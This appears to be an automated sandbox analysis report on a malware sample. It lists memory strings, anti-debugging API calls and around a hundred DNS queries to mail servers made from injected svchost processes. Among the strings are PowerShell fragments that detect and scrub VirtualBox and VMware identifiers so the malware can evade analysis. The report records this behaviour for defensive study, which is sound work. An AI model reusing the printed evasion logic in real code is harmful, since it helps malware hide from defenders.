                      Source: svchost.exe, 00000012.00000000.2389029535.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                      Source: svchost.exe, 00000025.00000002.3566731323.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
                      Source: svchost.exe, 00000012.00000003.2447156347.00000205FBA03000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f588
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
                      Source: svchost.exe, 00000012.00000000.2390667937.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                      Source: svchost.exe, 00000012.00000000.2390371069.00000205FB933000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
                      Source: $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: svchost.exe, 00000025.00000000.2478863296.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c292b65879ff477a6af604113f58
                      Source: svchost.exe, 00000012.00000000.2389029535.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                      Source: svchost.exe, 00000025.00000002.3566731323.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
                      Source: svchost.exe, 00000025.00000002.3566731323.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000012.00000000.2389029535.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                      Source: svchost.exe, 00000025.00000002.3566731323.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000012.00000003.2468013769.00000205FBEAD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c292b65879ff477a6af604113f58PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                      Source: lsass.exe, 00000009.00000002.3571560766.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                      Source: svchost.exe, 00000025.00000002.3566731323.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000025.00000000.2478906977.000001C781E40000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                      Source: svchost.exe, 00000012.00000003.2447156347.00000205FBA03000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                      Source: dwm.exe, 0000000B.00000000.2336959469.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PointVMware&P
                      Source: svchost.exe, 00000012.00000003.2447348502.00000205FBA12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
                      Source: svchost.exe, 00000025.00000002.3569732643.000001C781E5B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c292b65879ff477a6af604113f58
                      Source: $778e373e, 00000006.00000002.3563173232.000000000132E000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328491778.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3566398984.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3570342911.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.2331426687.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000000.2365614210.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3568404917.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3557807339.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.2366393327.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.2370145365.00000254A2043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.3575863874.00000254A2043000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: lsass.exe, 00000009.00000002.3571560766.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                      Source: svchost.exe, 00000025.00000002.3569732643.000001C781E5B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: UDFBBSCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                      Source: svchost.exe, 00000025.00000002.3566731323.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                      Source: svchost.exe, 00000012.00000000.2389029535.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                      Source: svchost.exe, 0000000A.00000000.2331577136.00000195DD66A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: svchost.exe, 00000025.00000002.3566731323.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 0000001C.00000002.3560663509.000001B278E02000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                      Source: lsass.exe, 00000009.00000002.3571560766.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                      Source: svchost.exe, 00000025.00000000.2478863296.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000012.00000000.2389029535.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eAPI call chain: ExitProcess graph end nodegraph_6-8465
                      Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_7-8523
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FD689A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00FD689A
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FD309C mov eax, dword ptr fs:[00000030h]6_2_00FD309C
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FD96E1 mov ecx, dword ptr fs:[00000030h]6_2_00FD96E1
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FDAA90 mov eax, dword ptr fs:[00000030h]6_2_00FDAA90
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Code function: 3_2_004019E1 StrCatW,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,StrStrIW,StrCatW,StrStrIW,StrNCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrNCatW,StrCatW,StrCatW,StrCatW,StrStrIW,StrCatW,StrCpyW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,RtlFreeHeap,3_2_004019E1
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FD689A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00FD689A
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FDAAEA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00FDAAEA
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FD6B84 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00FD6B84
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000001B094E98170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000001B094E98170
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000001B094E984D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_000001B094E984D8
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000001B094E9D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000001B094E9D65C
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E858988170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001E858988170
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E85898D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001E85898D65C
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589884D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_000001E8589884D8
                      Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE8684D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00000140AE8684D8
                      Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE868170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000140AE868170
                      Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE86D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000140AE86D65C
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000195DD5C84D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00000195DD5C84D8
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000195DD5CD65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00000195DD5CD65C
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000195DD5C8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00000195DD5C8170
                      Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000257E10A84D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00000257E10A84D8
                      Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000257E10A8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000257E10A8170
                      Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000257E10AD65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000257E10AD65C
                      Source: C:\Windows\System32\svchost.exeCode function: 13_2_000001F28C938170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000001F28C938170
                      Source: C:\Windows\System32\svchost.exeCode function: 13_2_000001F28C9384D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_000001F28C9384D8
                      Source: C:\Windows\System32\svchost.exeCode function: 13_2_000001F28C93D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000001F28C93D65C
                      Source: C:\Windows\System32\svchost.exeCode function: 14_2_000001CA98548170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000001CA98548170
                      Source: C:\Windows\System32\svchost.exeCode function: 14_2_000001CA985484D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_000001CA985484D8
                      Source: C:\Windows\System32\svchost.exeCode function: 14_2_000001CA9854D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000001CA9854D65C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001D2653184D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001D2653184D8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001D265318170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001D265318170
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001D26531D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001D26531D65C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000254A2D4D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00000254A2D4D65C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000254A2D48170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00000254A2D48170
                      Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000254A2D484D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00000254A2D484D8
                      Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000024B87DD84D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0000024B87DD84D8
                      Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000024B87DDD65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000024B87DDD65C
                      Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000024B87DD8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000024B87DD8170
                      Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000205FD408170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000205FD408170
                      Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000205FD40D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000205FD40D65C
                      Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000205FD4084D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00000205FD4084D8
                      Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001A2056A8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001A2056A8170
                      Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001A2056AD65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001A2056AD65C
                      Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001A2056A84D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_000001A2056A84D8
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\svchost.exeDomain query: out.sonar.co.hu
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.rennes.inra.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.a1.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.flt.khaitanpublicschool.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.acetec.es
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.shaw.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: out.rsaweb.co.za
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.cimtel.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.postfund.com.cn
                      Source: C:\Windows\System32\svchost.exeDomain query: marriot.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx10.se.isp-net.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.piramitgroup.org
                      Source: C:\Windows\System32\svchost.exeDomain query: out.caso.es
                      Source: C:\Windows\System32\svchost.exeDomain query: bisol-it.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: walla.com
                      Source: C:\Windows\System32\svchost.exeDomain query: alt2.aspmx.l.google.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.lovefromaustralia.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: out.xnodfu.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.host-41-196-190-143.static.link.com.eg
                      Source: C:\Windows\System32\svchost.exeDomain query: tpcompany.co.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: hcmp.co.kr
                      Source: C:\Windows\System32\svchost.exeDomain query: izon-com.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: cdtm.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.planet.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: naoansiedade.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: zing.vn
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ntlworld.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.patrickdavid.de
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.robbievox.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.opsofis.com
                      Source: C:\Windows\System32\svchost.exeDomain query: povprint-com.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: audiomaster.es
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ezysurf.co.nz
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.ezz.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ns.sympatico.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.unigel.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: rogers.com
                      Source: C:\Windows\System32\svchost.exeDomain query: ghuitf.com
                      Source: C:\Windows\System32\svchost.exeDomain query: canesoverhere.com
                      Source: C:\Windows\System32\svchost.exeDomain query: upcmail.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: out.teccart.online
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.telenet.be
                      Source: C:\Windows\System32\svchost.exeDomain query: geoanalize.lt
                      Source: C:\Windows\System32\svchost.exeDomain query: out.caledonian.ac.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mx0.dravanet.net
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.xlxe.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: hmajdal.tzafonet.org.il
                      Source: C:\Windows\System32\svchost.exeDomain query: out.thegreataunties.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.seregon.com
                      Source: C:\Windows\System32\svchost.exeDomain query: ASPMX3.GOOGLEMAIL.COM
                      Source: C:\Windows\System32\svchost.exeDomain query: route1.mx.cloudflare.net
                      Source: C:\Windows\System32\svchost.exeDomain query: ybb.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.ddfs.dsf
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.me.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.nifty.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.qatar.net.qa
                      Source: C:\Windows\System32\svchost.exeDomain query: bunge-it.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.centrum.cz
                      Source: C:\Windows\System32\svchost.exeDomain query: out.mytrixtech.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx00.ionos.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.rikkebruun.dk
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.jmichaelvinson.com
                      Source: C:\Windows\System32\svchost.exeDomain query: rozpedowscy.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp1d.netintelligence.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.bwana.org
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.southeasternacademy.org
                      Source: C:\Windows\System32\svchost.exeDomain query: out.viasu.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.lachambre.be
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.fada.co.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.heroofhealth.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.vermessungsseiten.de
                      Source: C:\Windows\System32\svchost.exeDomain query: wonder.ocn.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: nate.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.lykiabotanika.com
                      Source: C:\Windows\System32\svchost.exeDomain query: extensic.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.reprobel.be
                      Source: C:\Windows\System32\svchost.exeDomain query: peoplepc.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.amtelecom.net
                      Source: C:\Windows\System32\svchost.exeDomain query: dr-thomas-maier.de
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.anystars.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ciudad.com.ar
                      Source: C:\Windows\System32\svchost.exeDomain query: w0114c6a.kasserver.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.bbsyd.dk
                      Source: C:\Windows\System32\svchost.exeDomain query: yomar.ma
                      Source: C:\Windows\System32\svchost.exeDomain query: ccj.com
                      Source: C:\Windows\System32\svchost.exeDomain query: m.dogspot.in
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.17hotmayil.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.zgm.de
                      Source: C:\Windows\System32\svchost.exeDomain query: poczta.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.stvnet.home.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: avweb.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.online.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: yaho.de
                      Source: C:\Windows\System32\svchost.exeDomain query: newday-technology.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtpin.rzone.de
                      Source: C:\Windows\System32\svchost.exeDomain query: wavedirect.nett.net
